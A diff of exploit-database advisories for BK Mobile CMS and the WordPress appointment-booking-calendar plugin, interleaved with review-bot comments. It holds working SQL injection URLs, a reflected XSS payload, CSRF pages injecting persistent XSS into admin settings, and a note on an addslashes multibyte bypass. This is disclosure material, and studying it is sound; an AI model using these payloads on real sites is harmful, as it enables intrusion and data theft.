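Review bot: The PoC form posts `_mysite_download_skin=/etc/passwd` to `dl-skin.php`, which together with the local file-disclosure description implies the script reads whatever path that field names, yet the file carries no remediation note. Worth adding above the `<html>` block: `Fix: dl-skin.php must resolve _mysite_download_skin to a file inside the theme's skin directory (basename only, no path separators) and refuse anything else.` No fixed theme version is named either, so readers cannot tell whether current releases of Elegance are affected.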
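--- a/platforms/php/webapps/39339.txt
+++ b/platforms/php/webapps/39339.txt
@@ -0,0 +1,98 @@
+#Product : BK Mobile CMS
+#Exploit Author : Rahul Pratap Singh
+#Version : 2.4
+#Home page Link :
+http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
+#Website : 0x62626262.wordpress.com
+#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
+#Date : 27/Jan/2016
+
+SQLi Vulnerability:
+
+----------------------------------------
+Description:
+----------------------------------------
+"g_name" parameter is not sanitized that leads to SQL Injection.
+
+----------------------------------------
+Vulnerable Code:
+----------------------------------------
+file: gallery1.php
+line 5
+
+$get_g_name = $_GET['g_name'];
+$query_photos = "SELECT * FROM ".$get_prefix."photos WHERE
+gallery_name='".$get_g_name."' ORDER BY id DESC";
+
+----------------------------------------
+Exploit:
+----------------------------------------
+http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=1%27%20union%20all%20select%201,2,3,group_concat%28version%28%29%29,5--+
+
+----------------------------------------
+POC:
+----------------------------------------
+https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatesqlipoc.png
+
+
+XSS Vulnerability:
+
+----------------------------------------
+Description:
+----------------------------------------
+"g_name" parameter is not sanitized that leads to reflected XSS.
+
+----------------------------------------
+Vulnerable Code:
+----------------------------------------
+file: gallery1.php
+
+line 81-88
+
+<div data-role="page" id="<?php echo $get_g_name; ?>" class="jqm-demos"
+<?php echo $custom_bg_active; ?>>
+
+<?php include("../header.php"); ?>
+
+<div role="main" class="ui-content">
+
+<div class="jqm-block-content">
+<h3><?php echo $_GET['g_name']; ?></h3>
+
+----------------------------------------
+Exploit:
+----------------------------------------
+http://localhost/BKMobile%20CMS/user/gallery1.php?g_name=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
+
+----------------------------------------
+POC:
+----------------------------------------
+https://0x62626262.files.wordpress.com/2016/01/bk-mobile-templatexsspoc.png
+
+Fix:
+Update to 2.5
+
+Vulnerability Disclosure Timeline:
+→ January 14, 2015 – Bug discovered, initial report to Vendor
+→ January 14, 2015 – Vendor acknowledged
+→ January 19, 2015 – Vendor Deployed a Patch
+
+#######################################
+# CTG SECURITY SOLUTIONS #
+# www.ctgsecuritysolutions.com #
+#######################################
+
+Pub Ref:
+https://0x62626262.wordpress.com/2016/01/27/bk-mobile-cms-sqli-and-xss-vulnerability
+http://codecanyon.net/item/jquery-mobile-website-with-full-admin-panel/2441358
+
+[+] Disclaimer
+
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.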
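Review bot: The three timeline lines are dated `January 14, 2015` to `January 19, 2015`, while the `#Date` header says `27/Jan/2016` and both PoC screenshots sit under `/2016/01/`, so the year in the timeline looks like a typo for 2016 and should be corrected. The `Fix:` section only says `Update to 2.5`; since the file quotes the vulnerable lines, a code-level note would help anyone maintaining a fork: `$query_photos` concatenates `$get_g_name` straight into the `WHERE` clause and needs a prepared statement with a bound parameter, and the two `g_name` echoes quoted from lines 81-88 need `htmlspecialchars()` before being written into the page.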
103
platforms/php/webapps/39341.txt
Executable file
103
platforms/php/webapps/39341.txt
Executable file
|
@ -0,0 +1,103 @@
|
|||
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - Privilege escalation (Managing calendars) & Persistent XSS
|
||||
# Date: 2016-01-28
|
||||
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
|
||||
# Exploit Author: Joaquin Ramirez Martinez [ i0 security-lab]
|
||||
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
|
||||
# Vendor: CodePeople.net
|
||||
# Vebdor URI: http://codepeople.net
|
||||
# Version: 1.1.24
|
||||
# Tested on: windows 10 + firefox + sqlmap 1.0.
|
||||
|
||||
===================
|
||||
PRODUCT DESCRIPTION
|
||||
===================
|
||||
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
|
||||
a calendar**. The booking form is linked to a **PayPal** payment process.
|
||||
|
||||
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
|
||||
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
|
||||
that can be accepted for each time-slot."
|
||||
|
||||
(copy of readme file)
|
||||
|
||||
|
||||
======================
|
||||
EXPLOITATION TECHNIQUE
|
||||
======================
|
||||
remote
|
||||
|
||||
==============
|
||||
SEVERITY LEVEL
|
||||
==============
|
||||
|
||||
medium
|
||||
|
||||
================================
|
||||
TECHNICAL DETAILS && DESCRIPTION
|
||||
================================
|
||||
|
||||
Multiple privilege escalation were found in appointment-booking-calendar plugin that allows remote low level
|
||||
and unauthenticated users to update calendar owners and options (allowing persistent XSS).
|
||||
|
||||
================
|
||||
PROOF OF CONCEPT
|
||||
================
|
||||
|
||||
Changing all appointment tables with UTF-8 charset, injecting persistent XSS into ´ict´ and ´ics´ options and setting
|
||||
´CPABC_APPOINTMENTS_LOAD_SCRIPTS´ option to value ´1´.
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&ac=st&chs=UTF-8&ict=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&ics=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&scr=1", true);
xhr.send();
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Updating calendar with id 1 and setting name with persistent XSS (if the shortcode [CPABC_APPOINTMENT_CALENDAR calendar="1"]
is added in a post, the injected XSS will appear, in administration page appear too).
<html>
<!-- CSRF PoC - generated by Burp Suite i0 SecLab plugin -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://localhost:80/wordpress/wp-admin/admin.php?page=cpabc_appointments&u=1&owner=5&name=%3C%2Foption%3E%3C%2Fselect%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2Fjoaquin%2F%29%3E%3C", true);
xhr.send();
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]yandex[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/user/strparser_lk
========
TIMELINE
========
2016-01-08 vulnerability discovered
2016-01-24 reported to vendor
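--- /dev/null
+++ b/platforms/php/webapps/39342.txt
@@ -0,0 +1,136 @@
+# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
+# Date: 2016-01-28
+# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
+# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
+# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
+# Vendor: CodePeople.net
+# Vebdor URI: http://codepeople.net
+# Version: 1.1.24
+# OWASP Top10: A1-Injection
+# Tested on: windows 10 + firefox + sqlmap 1.0.
+
+===================
+PRODUCT DESCRIPTION
+===================
+"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
+a calendar**. The booking form is linked to a **PayPal** payment process.
+
+You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
+where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
+that can be accepted for each time-slot."
+
+(copy of readme file)
+
+
+======================
+EXPLOITATION TECHNIQUE
+======================
+remote
+
+==============
+SEVERITY LEVEL
+==============
+
+critical
+
+================================
+TECHNICAL DETAILS && DESCRIPTION
+================================
+
+A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
+
+The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
+The action is added with ´init´ tag, so it function is called every time when parameter
+´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
+
+Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
+the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
+function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
+
+The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
+can compromise the entire web server.
+
+================
+PROOF OF CONCEPT
+================
+
+An unauthenticated attacker can make a request like...
+
+http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
+&cpabc_calendar_update=1&id=<owned calendar id>
+
+Example:
+
+Exploiting simple SQL injection:
+
+http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
+&cpabc_calendar_update=1&id=1
+
+Post data:
+specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
+&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5& imeWorkingDates6
+
+All post variables are vulnerable to SQLi with ´addslashes´ bypass.
+
+===============
+VULNERABLE CODE
+===============
+
+located in ´cpabc_appointments.php´
+
+function cpabc_appointments_calendar_update() {
+global $wpdb, $user_ID;
+
+if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
+return;
+
+$calid = intval(str_replace (CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
+if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
+return;
+echo "sa";
+cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
+
+//@ob_clean();
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Pragma: no-cache");
+if ( $user_ID )
+$wpdb->query("update ".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
+.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
+"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
+CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
+.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
+.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
+."='".$_POST["timeWorkingDates6"]."' where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
+
+exit();
+}
+
+
+===========
+
+
+Note:
+cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
+
+
+==========
+CREDITS
+==========
+
+Vulnerability discovered by:
+Joaquin Ramirez Martinez [i0 security-lab]
+strparser[at]gmail[dot]com
+https://www.facebook.com/I0-security-lab-524954460988147/
+https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
+
+
+========
+TIMELINE
+========
+
+2016-01-08 vulnerability discovered
+2016-01-24 reported to vendor
+2016-01-27 released plugin version 1.1.25
+2016-01-28 public disclousure
+
+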
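Review bot: The request template under PROOF OF CONCEPT names `action=cpabc_appointments_check_posted_data`, but the action the advisory identifies as vulnerable, and the one both the worked example and the listed function use, is `cpabc_appointments_calendar_update`; the template line should read `http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=<owned calendar id>`. The sentence "An unauthenticated attacker can make a request like..." also contradicts the TECHNICAL DETAILS paragraph, which requires owning a calendar or holding `edit_pages`, and the listed code only issues the UPDATE inside `if ( $user_ID )`, i.e. for a logged-in user, so the PoC should state that an authenticated calendar owner (or editor/admin) is required. It would further help to name the connection character set the `addslashes` bypass depends on (presumably a multibyte set such as GBK, where a `%bf%27` sequence survives the escaping), since with a plain UTF-8 connection the escaped quote is not expected to be bypassable and the POST values shown are not injectable as written. Finally, the `echo "sa";` in the listing looks like a leftover debug statement rather than part of the flaw and is worth labelling as such so readers do not search for its role.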